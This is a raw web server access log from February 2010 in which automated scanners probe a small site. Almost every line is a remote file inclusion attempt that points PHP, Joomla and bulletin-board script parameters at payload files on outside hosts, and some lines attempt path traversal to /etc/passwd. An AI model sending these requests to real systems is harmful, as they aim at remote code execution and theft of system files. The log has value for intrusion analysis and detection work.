212.227.29.27 - - [06/Feb/2010:05:34:48 -0800] "GET /logs/access.log%20%20/?mosConfig_absolute.path=http://www.noin9191.com/ams/ammember/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
212.227.29.27 - - [06/Feb/2010:05:34:48 -0800] "GET /?mosConfig_absolute.path=http://www.noin9191.com/ams/ammember/auto1.txt??? HTTP/1.1" 200 924 "-" "Mozilla/5.0" "allattitudedoxies.com"
212.227.29.27 - - [06/Feb/2010:05:34:48 -0800] "GET /logs/?mosConfig_absolute.path=http://www.noin9191.com/ams/ammember/auto1.txt??? HTTP/1.1" 200 1510 "-" "Mozilla/5.0" "allattitudedoxies.com"
203.251.80.167 - - [06/Feb/2010:05:35:06 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.festselection.de//components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
203.251.80.167 - - [06/Feb/2010:05:35:06 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://www.festselection.de//components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
203.251.80.167 - - [06/Feb/2010:05:35:06 -0800] "GET /logs/access.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.festselection.de//components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
210.116.103.118 - - [06/Feb/2010:05:36:07 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://nastudy.net/data/item/hosting/a?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
210.116.103.118 - - [06/Feb/2010:05:36:07 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://nastudy.net/data/item/hosting/a?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
210.116.103.118 - - [06/Feb/2010:05:36:08 -0800] "GET /logs/access.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://nastudy.net/data/item/hosting/a?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
210.116.103.118 - - [06/Feb/2010:05:38:43 -0800] "GET /logs/access.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://nastudy.net/data/item/hosting/a?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
210.116.103.118 - - [06/Feb/2010:05:38:43 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://nastudy.net/data/item/hosting/a?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
210.116.103.118 - - [06/Feb/2010:05:38:43 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://nastudy.net/data/item/hosting/a?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
212.227.29.27 - - [06/Feb/2010:05:42:44 -0800] "GET /logs/access.log/?mosConfig_absolute.path=http://www.noin9191.com/ams/ammember/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
203.251.80.167 - - [06/Feb/2010:05:42:54 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
203.251.80.167 - - [06/Feb/2010:05:42:54 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
203.251.80.167 - - [06/Feb/2010:05:42:54 -0800] "GET /logs/access.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
58.150.99.131 - - [06/Feb/2010:05:46:38 -0800] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
58.150.99.131 - - [06/Feb/2010:05:46:39 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
58.150.99.131 - - [06/Feb/2010:05:46:39 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
58.150.99.131 - - [06/Feb/2010:05:46:51 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
58.150.99.131 - - [06/Feb/2010:05:46:51 -0800] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
58.150.99.131 - - [06/Feb/2010:05:46:51 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
58.150.99.131 - - [06/Feb/2010:05:51:27 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
58.150.99.131 - - [06/Feb/2010:05:51:27 -0800] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
58.150.99.131 - - [06/Feb/2010:05:51:27 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
67.218.116.130 - - [06/Feb/2010:05:57:28 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.allattitudedoxies.com"
66.103.128.44 - - [06/Feb/2010:06:00:27 -0800] "GET /delete_comment.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
66.103.128.44 - - [06/Feb/2010:06:00:28 -0800] "GET /logs//delete_comment.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
66.103.128.44 - - [06/Feb/2010:06:00:28 -0800] "GET /logs/access.log%20%20//delete_comment.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
218.38.136.126 - - [06/Feb/2010:06:01:41 -0800] "GET /logs/////?SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1518 "-" "Mozilla/5.0" "allattitudedoxies.com"
218.38.136.126 - - [06/Feb/2010:06:01:41 -0800] "GET /logs/access.log%20%20/////?SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
218.38.136.126 - - [06/Feb/2010:06:01:41 -0800] "GET ////?SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "allattitudedoxies.com"
218.38.136.126 - - [06/Feb/2010:06:03:18 -0800] "GET /logs/access.log%20%20/////?SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
218.38.136.126 - - [06/Feb/2010:06:03:18 -0800] "GET ////?SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "allattitudedoxies.com"
218.38.136.126 - - [06/Feb/2010:06:03:18 -0800] "GET /logs/////?SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1518 "-" "Mozilla/5.0" "allattitudedoxies.com"
61.78.109.87 - - [06/Feb/2010:06:06:14 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
61.78.109.87 - - [06/Feb/2010:06:06:14 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
61.78.109.87 - - [06/Feb/2010:06:06:24 -0800] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
66.103.128.44 - - [06/Feb/2010:06:22:36 -0800] "GET /logs/access.log//bbs//write_update.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
66.103.128.44 - - [06/Feb/2010:06:22:36 -0800] "GET /bbs//write_update.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
66.103.128.44 - - [06/Feb/2010:06:22:36 -0800] "GET /logs//bbs//write_update.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
24.23.78.174 - - [06/Feb/2010:06:26:15 -0800] "GET /logs/access.log//components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "www.allattitudedoxies.com"
24.23.78.174 - - [06/Feb/2010:06:26:15 -0800] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "www.allattitudedoxies.com"
24.23.78.174 - - [06/Feb/2010:06:26:15 -0800] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "www.allattitudedoxies.com"
66.103.128.44 - - [06/Feb/2010:06:28:12 -0800] "GET /bbs//write_update.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
66.103.128.44 - - [06/Feb/2010:06:28:12 -0800] "GET /logs//bbs//write_update.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
66.103.128.44 - - [06/Feb/2010:06:28:12 -0800] "GET /logs/access.log%20%20//bbs//write_update.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
212.227.29.27 - - [06/Feb/2010:06:30:04 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute.path=http://www.noin9191.com/ams/ammember/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
212.227.29.27 - - [06/Feb/2010:06:30:04 -0800] "GET /logs/access.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute.path=http://www.noin9191.com/ams/ammember/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
212.227.29.27 - - [06/Feb/2010:06:30:04 -0800] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute.path=http://www.noin9191.com/ams/ammember/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
212.227.29.27 - - [06/Feb/2010:06:36:41 -0800] "GET /logs/access.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute.path=http://www.noin9191.com/ams/ammember/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
180.68.206.252 - - [06/Feb/2010:06:38:45 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
180.68.206.252 - - [06/Feb/2010:06:38:54 -0800] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
180.68.206.252 - - [06/Feb/2010:06:38:56 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
213.175.213.166 - - [06/Feb/2010:06:47:20 -0800] "GET /logs/access.log%20%20//main.php?sayfa=http://www.cnkabu.com//id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
213.175.213.166 - - [06/Feb/2010:06:47:20 -0800] "GET /main.php?sayfa=http://www.cnkabu.com//id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
213.175.213.166 - - [06/Feb/2010:06:47:21 -0800] "GET /logs//main.php?sayfa=http://www.cnkabu.com//id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
213.175.213.166 - - [06/Feb/2010:06:48:16 -0800] "GET /main.php?sayfa=http://www.cnkabu.com//id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
213.175.213.166 - - [06/Feb/2010:06:48:16 -0800] "GET /logs/access.log//main.php?sayfa=http://www.cnkabu.com//id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
213.175.213.166 - - [06/Feb/2010:06:48:16 -0800] "GET /logs//main.php?sayfa=http://www.cnkabu.com//id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
218.38.136.126 - - [06/Feb/2010:06:53:00 -0800] "GET /skauti//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
218.38.136.126 - - [06/Feb/2010:06:53:00 -0800] "GET /logs//skauti//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
218.38.136.126 - - [06/Feb/2010:06:53:00 -0800] "GET /logs/access.log%20%20//skauti//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
218.38.136.126 - - [06/Feb/2010:06:53:33 -0800] "GET /skauti//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
218.38.136.126 - - [06/Feb/2010:06:53:33 -0800] "GET /logs/access.log%20%20//skauti//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
218.38.136.126 - - [06/Feb/2010:06:53:34 -0800] "GET /logs//skauti//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
188.138.32.230 - - [06/Feb/2010:06:56:19 -0800] "GET /logs//delete_all.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
188.138.32.230 - - [06/Feb/2010:06:56:19 -0800] "GET /logs/access.log%20%20//delete_all.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
188.138.32.230 - - [06/Feb/2010:06:56:19 -0800] "GET /delete_all.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
188.138.32.230 - - [06/Feb/2010:06:56:39 -0800] "GET /logs//delete_all.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
188.138.32.230 - - [06/Feb/2010:06:56:40 -0800] "GET /delete_all.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
188.138.32.230 - - [06/Feb/2010:06:56:40 -0800] "GET /logs/access.log%20%20//delete_all.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
173.165.1.69 - - [06/Feb/2010:06:58:14 -0800] "GET /logs/access.log%20%20/errors.php?error=http://www.leiterschaft.de/cms/public/lengkap/idlab1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
173.165.1.69 - - [06/Feb/2010:06:58:14 -0800] "GET /logs/errors.php?error=http://www.leiterschaft.de/cms/public/lengkap/idlab1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
173.165.1.69 - - [06/Feb/2010:06:58:14 -0800] "GET /errors.php?error=http://www.leiterschaft.de/cms/public/lengkap/idlab1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
207.7.108.149 - - [06/Feb/2010:06:59:27 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
207.7.108.149 - - [06/Feb/2010:06:59:27 -0800] "GET /logs/access.log%20%20//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
207.7.108.149 - - [06/Feb/2010:06:59:27 -0800] "GET /logs//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
194.1.150.2 - - [06/Feb/2010:06:59:29 -0800] "GET /bbs//write_update.php?board_skin_path=http://bethelphotoworks.com//joomla15/templates/rt_perihelion/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
194.1.150.2 - - [06/Feb/2010:06:59:29 -0800] "GET /logs/access.log//bbs//write_update.php?board_skin_path=http://bethelphotoworks.com//joomla15/templates/rt_perihelion/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
194.1.150.2 - - [06/Feb/2010:06:59:29 -0800] "GET /logs//bbs//write_update.php?board_skin_path=http://bethelphotoworks.com//joomla15/templates/rt_perihelion/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
115.68.4.44 - - [06/Feb/2010:06:59:31 -0800] "GET /logs//bbs//skin/jaemanstyle_s01_blue/setup.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
115.68.4.44 - - [06/Feb/2010:06:59:31 -0800] "GET /bbs//skin/jaemanstyle_s01_blue/setup.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
115.68.4.44 - - [06/Feb/2010:06:59:31 -0800] "GET /logs/access.log%20%20//bbs//skin/jaemanstyle_s01_blue/setup.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
218.38.136.125 - - [06/Feb/2010:06:59:51 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
218.38.136.125 - - [06/Feb/2010:06:59:51 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
218.38.136.125 - - [06/Feb/2010:06:59:52 -0800] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
77.221.130.15 - - [06/Feb/2010:07:00:15 -0800] "GET /logs//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
77.221.130.15 - - [06/Feb/2010:07:00:15 -0800] "GET /logs/access.log%20%20//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
77.221.130.15 - - [06/Feb/2010:07:00:15 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
66.103.128.44 - - [06/Feb/2010:07:00:52 -0800] "GET /logs//bbs//write_update.php?board_skin_path=http://www.sarpifirenze.it/media/ahhe.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "allattitudedoxies.com"
66.103.128.44 - - [06/Feb/2010:07:00:54 -0800] "GET /bbs//write_update.php?board_skin_path=http://www.sarpifirenze.it/media/ahhe.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "allattitudedoxies.com"
212.227.251.152 - - [06/Feb/2010:07:01:15 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
212.227.251.152 - - [06/Feb/2010:07:01:15 -0800] "GET /logs//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
212.227.251.152 - - [06/Feb/2010:07:01:15 -0800] "GET /logs/access.log%20%20//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
115.68.4.44 - - [06/Feb/2010:07:01:33 -0800] "GET /bbs//skin/jaemanstyle_s01_blue/setup.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
115.68.4.44 - - [06/Feb/2010:07:01:33 -0800] "GET /logs//bbs//skin/jaemanstyle_s01_blue/setup.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
115.68.4.44 - - [06/Feb/2010:07:01:34 -0800] "GET /logs/access.log%20%20//bbs//skin/jaemanstyle_s01_blue/setup.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
207.7.108.149 - - [06/Feb/2010:07:01:57 -0800] "GET /logs/access.log//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
79.98.23.9 - - [06/Feb/2010:07:02:45 -0800] "GET /logs//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
79.98.23.9 - - [06/Feb/2010:07:02:45 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
79.98.23.9 - - [06/Feb/2010:07:02:45 -0800] "GET /logs/access.log%20%20//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
87.106.29.8 - - [06/Feb/2010:07:02:48 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
87.106.29.8 - - [06/Feb/2010:07:02:48 -0800] "GET /logs//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
87.106.29.8 - - [06/Feb/2010:07:02:48 -0800] "GET /logs/access.log%20%20//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
115.68.4.44 - - [06/Feb/2010:07:03:16 -0800] "GET /logs/access.log//bbs//skin/jaemanstyle_s01_blue/setup.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
77.221.130.15 - - [06/Feb/2010:07:03:52 -0800] "GET /logs/access.log//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
115.68.4.44 - - [06/Feb/2010:07:05:09 -0800] "GET /logs/access.log//bbs//skin/jaemanstyle_s01_blue/setup.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
61.250.92.167 - - [06/Feb/2010:07:05:36 -0800] "GET /logs/access.log%20%20//main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
61.250.92.167 - - [06/Feb/2010:07:05:36 -0800] "GET /main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
61.250.92.167 - - [06/Feb/2010:07:05:37 -0800] "GET /logs//main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
61.250.92.167 - - [06/Feb/2010:07:06:12 -0800] "GET /logs/access.log%20%20//main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
61.250.92.167 - - [06/Feb/2010:07:06:12 -0800] "GET /logs//main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
